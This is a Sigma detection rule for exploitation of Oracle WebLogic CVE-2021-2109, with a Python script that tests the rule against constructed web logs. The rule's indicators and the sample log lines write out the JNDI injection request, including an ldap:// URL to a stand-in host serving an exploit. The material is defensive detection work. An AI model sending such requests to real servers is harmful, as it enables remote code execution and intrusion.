Oracle WebLogic Exploit CVE-2021-2109

Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109

Sigma rule

title: Oracle WebLogic Exploit CVE-2021-2109
id: 687f6504-7f44-4549-91fc-f07bab065821
status: test
description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
references:
    - https://twitter.com/pyn3rd/status/1351696768065409026
    - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
author: Bhabesh Raj
date: 2021/01/20
modified: 2023/01/02
tags:
    - attack.t1190
    - attack.initial_access
    - cve.2021.2109
    - detection.emerging_threats
logsource:
    category: webserver
detection:
    selection:
        cs-method: 'GET'
        cs-uri-query|contains|all:
            - 'com.bea.console.handles.JndiBindingHandle'
            - 'ldap://'
            - 'AdminServer'
    condition: selection
fields:
    - c-ip
    - c-dns
falsepositives:
    - Unknown
level: critical
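The selection above is three substring checks ANDed together on the query string of GET requests. The following Python is an added example, not part of the SigmaHQ rule or this page, that applies that selection to a few constructed W3C extended log lines (the field order and the sample requests are assumptions made for the example, not captured traffic). It also goes one step beyond the rule as written: an optional percent-decoding pass, because a log source that stores the raw query would record `ldap://` as `ldap%3A%2F%2F` and the literal `contains` would miss it.

```python
from urllib.parse import unquote

# Assumed W3C extended-log field order for the constructed sample below
# (the rule's webserver logsource uses these cs-*/c-* field names).
FIELDS = ("date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status")

# The strings from the rule's cs-uri-query|contains|all selection.
INDICATORS = ("com.bea.console.handles.JndiBindingHandle", "ldap://", "AdminServer")

# Constructed sample log (not real traffic). Line 2 carries the three strings
# verbatim, line 3 carries the same query percent-encoded, line 4 is a POST.
SAMPLE_LOG = """\
2021-01-21 10:00:01 203.0.113.5 GET /console/console.portal _nfpb=true&_pageLabel=HomePage1 200
2021-01-21 10:00:02 203.0.113.5 GET /console/console.portal handle=com.bea.console.handles.JndiBindingHandle("ldap://198.51.100.9:1389/Exploit;AdminServer") 200
2021-01-21 10:00:03 203.0.113.7 GET /console/console.portal handle=com.bea.console.handles.JndiBindingHandle(%22ldap%3A%2F%2F198.51.100.9%3A1389%2Fa%3BAdminServer%22) 200
2021-01-21 10:00:04 198.51.100.20 POST /console/j_security_check j_username=weblogic 302
"""


def parse_w3c_line(line: str):
    """Split one W3C-style line into a field dict; return None if malformed."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def matches_rule(event: dict, decode_query: bool = False) -> bool:
    """Apply the rule's selection: method GET and all three indicators present
    in cs-uri-query. Sigma string matching is case-insensitive, so compare in
    lower case. decode_query=True percent-decodes the query first; this is an
    addition beyond the rule as written, for logs that keep the raw query."""
    if event["cs-method"].upper() != "GET":
        return False
    query = event["cs-uri-query"]
    if decode_query:
        query = unquote(query)
    query = query.lower()
    return all(indicator.lower() in query for indicator in INDICATORS)


def scan(log_text: str, decode_query: bool = False) -> list:
    """Return matching events, keeping the rule's c-ip output field plus the query."""
    hits = []
    for line in log_text.splitlines():
        event = parse_w3c_line(line)
        if event and matches_rule(event, decode_query):
            hits.append({"c-ip": event["c-ip"], "cs-uri-query": event["cs-uri-query"]})
    return hits


if __name__ == "__main__":
    for label, decode in (("literal match", False), ("percent-decoded match", True)):
        print(label)
        for hit in scan(SAMPLE_LOG, decode):
            print("  ", hit["c-ip"], hit["cs-uri-query"])
```

Run as-is, the literal pass flags only the second line; the decoded pass also flags the third. Whether you need the decoding step depends on the log pipeline: check whether your web server or collector normalises `cs-uri-query` before it reaches the SIEM, and if it does not, match on a decoded copy of the field rather than widening the rule's strings.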
